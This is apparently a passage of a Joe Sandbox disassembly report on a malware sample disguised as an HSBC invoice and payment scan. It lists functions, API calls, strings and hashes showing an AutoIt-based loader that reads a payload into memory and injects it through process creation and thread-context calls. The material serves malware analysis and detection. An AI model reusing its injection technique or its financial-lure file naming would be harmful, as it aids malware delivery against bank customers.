                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                    • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                    • API String ID: 1825951767-3513169116
                    • Opcode ID: 9b8cb5e0fdac903f3b5024a6ebdcb88bf749d33184af01572172a03c38aadf9a
                    • Instruction ID: 9fae33047d6a8880c50b3e752a7083fcfa6f00a0870ee699927556b9be9b2d92
                    • Opcode Fuzzy Hash: 9b8cb5e0fdac903f3b5024a6ebdcb88bf749d33184af01572172a03c38aadf9a
                    • Instruction Fuzzy Hash: 00A16E7191021DAACF14FBA0CC95AEEB7B8BF15700F44142AF41EB7192EF749A09DB61
                    Function 00E22640 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 239fileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 940 e22640-e226ee call e20000 943 e226f5-e2271b call e23550 CreateFileW 940->943 946 e22722-e22732 943->946 947 e2271d 943->947 952 e22734 946->952 953 e22739-e22753 VirtualAlloc 946->953 948 e2286d-e22871 947->948 950 e228b3-e228b6 948->950 951 e22873-e22877 948->951 954 e228b9-e228c0 950->954 955 e22883-e22887 951->955 956 e22879-e2287c 951->956 952->948 957 e22755 953->957 958 e2275a-e22771 ReadFile 953->958 959 e228c2-e228cd 954->959 960 e22915-e2292a 954->960 961 e22897-e2289b 955->961 962 e22889-e22893 955->962 956->955 957->948 967 e22773 958->967 968 e22778-e227b8 VirtualAlloc 958->968 969 e228d1-e228dd 959->969 970 e228cf 959->970 963 e2293a-e22942 960->963 964 e2292c-e22937 VirtualFree 960->964 965 e228ab 961->965 966 e2289d-e228a7 961->966 962->961 964->963 965->950 966->965 967->948 971 e227ba 968->971 972 e227bf-e227da call e237a0 968->972 973 e228f1-e228fd 969->973 974 e228df-e228ef 969->974 970->960 971->948 980 e227e5-e227ef 972->980 977 e2290a-e22910 973->977 978 e228ff-e22908 973->978 976 e22913 974->976 976->954 977->976 978->976 981 e22822-e22836 call e235b0 980->981 982 e227f1-e22820 call e237a0 980->982 988 e2283a-e2283e 981->988 989 e22838 981->989 982->980 990 e22840-e22844 FindCloseChangeNotification 988->990 991 e2284a-e2284e 988->991 989->948 990->991 992 e22850-e2285b VirtualFree 991->992 993 e2285e-e22867 991->993 992->993 993->943 993->948
                    APIs
                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00E22711
                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00E22937
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272013729.0000000000E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e20000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: CreateFileFreeVirtual
                    • String ID: +/
                    • API String ID: 204039940-4233215163
                    • Opcode ID: 7a8af28d10d872e8c42d0e09e8738e4af41cabd85448581b7ead53f150642b41
                    • Instruction ID: 8963142d9c422428bcbcf9185c0e0a78ac4cb55455a26295fe29ba63f7932f50
                    • Opcode Fuzzy Hash: 7a8af28d10d872e8c42d0e09e8738e4af41cabd85448581b7ead53f150642b41
                    • Instruction Fuzzy Hash: 94A10774E00219EBDB18CFA4D894BEEB7B5BF48304F20915DE605BB280D7799A81DF94
                    Function 00E83015 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 71registrywindowclipboardCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • GetSysColorBrush.USER32(0000000F), ref: 00E83074
                    • RegisterClassExW.USER32(00000030), ref: 00E8309E
                    • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00E830AF
                    • LoadIconW.USER32(000000A9), ref: 00E830F2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Register$BrushClassClipboardColorFormatIconLoad
                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                    • API String ID: 975902462-1005189915
                    • Opcode ID: 338280fb25340807112e4c572e45c8cb66c7c519c295961fb70215f328df3954
                    • Instruction ID: a3c0a0d6f3bd64b99f9d6f8dac0b017ad9c953b3277f0364fbc7b3aba1d9cb7a
                    • Opcode Fuzzy Hash: 338280fb25340807112e4c572e45c8cb66c7c519c295961fb70215f328df3954
                    • Instruction Fuzzy Hash: CF3116B5940309AFDB50DFA4E885ACDBBF0FB1A710F10452AE990E62A0D3B54549EF92
                    Function 00E83041 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 54registrywindowclipboardCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • GetSysColorBrush.USER32(0000000F), ref: 00E83074
                    • RegisterClassExW.USER32(00000030), ref: 00E8309E
                    • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00E830AF
                    • LoadIconW.USER32(000000A9), ref: 00E830F2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Register$BrushClassClipboardColorFormatIconLoad
                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                    • API String ID: 975902462-1005189915
                    • Opcode ID: dbfad59e15f111ecb3c612fe606ef564d2263adc54b23eca85f6d77e84aebd85
                    • Instruction ID: 6f803984642109e81c9de70ea4a5a52c6618708956bf988e9f8c78942f75ac8b
                    • Opcode Fuzzy Hash: dbfad59e15f111ecb3c612fe606ef564d2263adc54b23eca85f6d77e84aebd85
                    • Instruction Fuzzy Hash: 4021C3B591031CAFDB10DFA4EC89B9DBBF4FB1A700F00412AF911E62A0D7B54548AF92
                    Function 00E839E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1082 e839e7-e83a57 CreateWindowExW * 2 ShowWindow * 2
                    APIs
                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E83A15
                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E83A36
                    • ShowWindow.USER32(00000000,?,?), ref: 00E83A4A
                    • ShowWindow.USER32(00000000,?,?), ref: 00E83A53
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Window$CreateShow
                    • String ID: AutoIt v3$edit
                    • API String ID: 1584632944-3779509399
                    • Opcode ID: 29240cb4af450fbb636e4623d36db50f9de3c06bacd61cf9aaa603b6335a4d32
                    • Instruction ID: ad4f76bd6e249affd0fd05ad889a1d138bd9529de57701fca4e8e94dcda0265b
                    • Opcode Fuzzy Hash: 29240cb4af450fbb636e4623d36db50f9de3c06bacd61cf9aaa603b6335a4d32
                    • Instruction Fuzzy Hash: 54F03A746402987EEF3117276C08E273E7DE7D7F50B00002ABD00E21B0C2E50800FAB2
                    Function 00E223B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 165fileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1083 e223b0-e22537 call e20000 call e222a0 CreateFileW 1090 e22539 1083->1090 1091 e2253e-e2254e 1083->1091 1092 e225f1-e225f6 1090->1092 1094 e22550 1091->1094 1095 e22555-e2256f VirtualAlloc 1091->1095 1094->1092 1096 e22573-e2258d ReadFile 1095->1096 1097 e22571 1095->1097 1098 e22591-e225cb call e222e0 call e212a0 1096->1098 1099 e2258f 1096->1099 1097->1092 1104 e225e7-e225ef ExitProcess 1098->1104 1105 e225cd-e225e2 call e22330 1098->1105 1099->1092 1104->1092 1105->1104
                    APIs
                      • Part of subcall function 00E222A0: Sleep.KERNELBASE(000001F4), ref: 00E222B1
                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00E2252A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272013729.0000000000E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e20000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: CreateFileSleep
                    • String ID: CWFNJ1JTDQN2UH5R80LYGX3Z2VY
                    • API String ID: 2694422964-2617192783
                    • Opcode ID: f301891bf8a50a731e754401a6a46cc96efabae78c7b5ef29d198cfde665c830
                    • Instruction ID: 8c637ad9dc5929a1b080e9d318141d511705be80b2f28cec88a6a191ab45b584
                    • Opcode Fuzzy Hash: f301891bf8a50a731e754401a6a46cc96efabae78c7b5ef29d198cfde665c830
                    • Instruction Fuzzy Hash: 28718430D04298EBEF11DBE4D8557EEBB75AF19304F048099E248BB2C0D7BA1B45CB66
                    Function 00E8410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1107 e8410d-e84123 1108 e84129-e8413e call e87b76 1107->1108 1109 e84200-e84204 1107->1109 1112 ebd5dd-ebd5ec LoadStringW 1108->1112 1113 e84144-e84164 call e87d2c 1108->1113 1116 ebd5f7-ebd60f call e87c8e call e87143 1112->1116 1113->1116 1117 e8416a-e8416e 1113->1117 1126 e8417e-e841fb call ea3020 call e8463e call ea2ffc Shell_NotifyIconW call e85a64 1116->1126 1129 ebd615-ebd633 call e87e0b call e87143 call e87e0b 1116->1129 1119 e84174-e84179 call e87c8e 1117->1119 1120 e84205-e8420e call e881a7 1117->1120 1119->1126 1120->1126 1126->1109 1129->1126
                    APIs
                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00EBD5EC
                      • Part of subcall function 00E87D2C: _memmove.LIBCMT ref: 00E87D66
                    • _memset.LIBCMT ref: 00E8418D
                    • _wcscpy.LIBCMT ref: 00E841E1
                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E841F1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                    • String ID: Line:
                    • API String ID: 3942752672-1585850449
                    • Opcode ID: a6137f28daacfc195210c24814aff04f4b45ff25f189c489f14e90313173fbca
                    • Instruction ID: 3748b49ee414bea48c698117d53bd8c19bf4450ed2b0565601f7c87d0666fa00
                    • Opcode Fuzzy Hash: a6137f28daacfc195210c24814aff04f4b45ff25f189c489f14e90313173fbca
                    • Instruction Fuzzy Hash: 2D31A171009309AAD721FB60DC45BDB77E8AF56304F10551EB58DB20E1EBB4A648D793
                    Function 00EA564D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                    • String ID:
                    • API String ID: 1559183368-0
                    • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                    • Instruction ID: 779e997d07ec942afde5a806c167ae08009a970c927b620c247d79b46f768b42
                    • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                    • Instruction Fuzzy Hash: 8051CA32A00B05DFDB248F79C8806AE77A5AF4A324F64972AF835BE1D0D770BD508B40
                    Function 00E869CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E84F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00F462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E84F6F
                    • _free.LIBCMT ref: 00EBE68C
                    • _free.LIBCMT ref: 00EBE6D3
                      • Part of subcall function 00E86BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00E86D0D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: _free$CurrentDirectoryLibraryLoad
                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                    • API String ID: 2861923089-1757145024
                    • Opcode ID: ca8adf7c3144fe921f7d25a1c03e568f50c5d57ca738e9829fbba89c37a83d63
                    • Instruction ID: 2f3f3c4223d6ae68a80d64b0c74c0d91168b6eb73ceafdb19f8b9f7ef319051a
                    • Opcode Fuzzy Hash: ca8adf7c3144fe921f7d25a1c03e568f50c5d57ca738e9829fbba89c37a83d63
                    • Instruction Fuzzy Hash: 5A914E71910219AFCF14EFA4C8919EEB7F4FF19314F14546AF81ABB2A1EB30A905DB50
                    Function 00E835B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                    Download Yara Rule
                    APIs
                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00E835A1,SwapMouseButtons,00000004,?), ref: 00E835D4
                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00E835A1,SwapMouseButtons,00000004,?,?,?,?,00E82754), ref: 00E835F5
                    • RegCloseKey.KERNELBASE(00000000,?,?,00E835A1,SwapMouseButtons,00000004,?,?,?,?,00E82754), ref: 00E83617
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: CloseOpenQueryValue
                    • String ID: Control Panel\Mouse
                    • API String ID: 3677997916-824357125
                    • Opcode ID: b10d1f962472697784d22d0166ea4d6c0d41e3761006827f4f20d3b04483c35d
                    • Instruction ID: 36458b21a69738bc6d173e95aab2c0a6f9f1a949dfdffba8d09865c5d7e5b694
                    • Opcode Fuzzy Hash: b10d1f962472697784d22d0166ea4d6c0d41e3761006827f4f20d3b04483c35d
                    • Instruction Fuzzy Hash: D5115A71910208BFDB20DF68DC40DEEBBB8EF04B44F0094A9F809E7210E2719F44A760
                    Function 00E212A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                    Download Yara Rule
                    APIs
                    • CreateProcessW.KERNELBASE(?,00000000), ref: 00E21A5B
                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E21AF1
                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E21B13
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272013729.0000000000E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e20000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                    • String ID:
                    • API String ID: 2438371351-0
                    • Opcode ID: 3790e136272a110f5ab4d8617909c812004bdd41f4683ed991f3cafb80161bff
                    • Instruction ID: fecacafaa7a29994dce2eec74b1ee5a8ee2a28e7ebc6f6feffb4195e7fc9b3ad
                    • Opcode Fuzzy Hash: 3790e136272a110f5ab4d8617909c812004bdd41f4683ed991f3cafb80161bff
                    • Instruction Fuzzy Hash: BC620A30A14258DBEB24CFA4D841BDEB376EF68304F1091A9D10DFB294E7799E81CB59
                    Function 00EE97E5 Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E85045: _fseek.LIBCMT ref: 00E8505D
                      • Part of subcall function 00EE99BE: _wcscmp.LIBCMT ref: 00EE9AAE
                      • Part of subcall function 00EE99BE: _wcscmp.LIBCMT ref: 00EE9AC1
                    • _free.LIBCMT ref: 00EE992C
                    • _free.LIBCMT ref: 00EE9933
                    • _free.LIBCMT ref: 00EE999E
                      • Part of subcall function 00EA2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00EA9C64), ref: 00EA2FA9
                      • Part of subcall function 00EA2F95: GetLastError.KERNEL32(00000000,?,00EA9C64), ref: 00EA2FBB
                    • _free.LIBCMT ref: 00EE99A6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                    • String ID:
                    • API String ID: 1552873950-0
                    • Opcode ID: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                    • Instruction ID: ea4051d2605339d775ce102b48eead7a99b5fbd125e60e1b6c71cd2a78341e07
                    • Opcode Fuzzy Hash: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                    • Instruction Fuzzy Hash: 585150B1904258AFDF249F65DC81A9EBBB9EF48310F1014AEB60DB7242DB715E80CF58
                    Function 00EA493A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                    • String ID:
                    • API String ID: 2782032738-0
                    • Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                    • Instruction ID: f2d98f6159a405269c80e0fb4edce14eeb9c7456fdb063a4ebb0d4ba02a8c862
                    • Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                    • Instruction Fuzzy Hash: F341E9B06007069BDB188E69C8805AF77A5EFCE354B24917DE855EF6C0E7B0BD508744
                    Function 00E873E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00EBEE62
                    • 75B5D0D0.COMDLG32(?), ref: 00EBEEAC
                      • Part of subcall function 00E848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E848A1,?,?,00E837C0,?), ref: 00E848CE
                      • Part of subcall function 00EA09D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00EA09F4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: NamePath$FullLong_memset
                    • String ID: X
                    • API String ID: 3051022977-3081909835
                    • Opcode ID: fc6ad2b956bf238f4744b6677b0195a98bd300099bb6508aab51d355f5dc6fe6
                    • Instruction ID: 29672edc0c7834bd7f610668b78c3bbb3de4cd2337f051c974feff96e6738159
                    • Opcode Fuzzy Hash: fc6ad2b956bf238f4744b6677b0195a98bd300099bb6508aab51d355f5dc6fe6
                    • Instruction Fuzzy Hash: C721A470A042589BCB11EFA4C845BEE7BF89F49314F10405AE40CFB282DBF499499F91
                    Function 00EE901B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
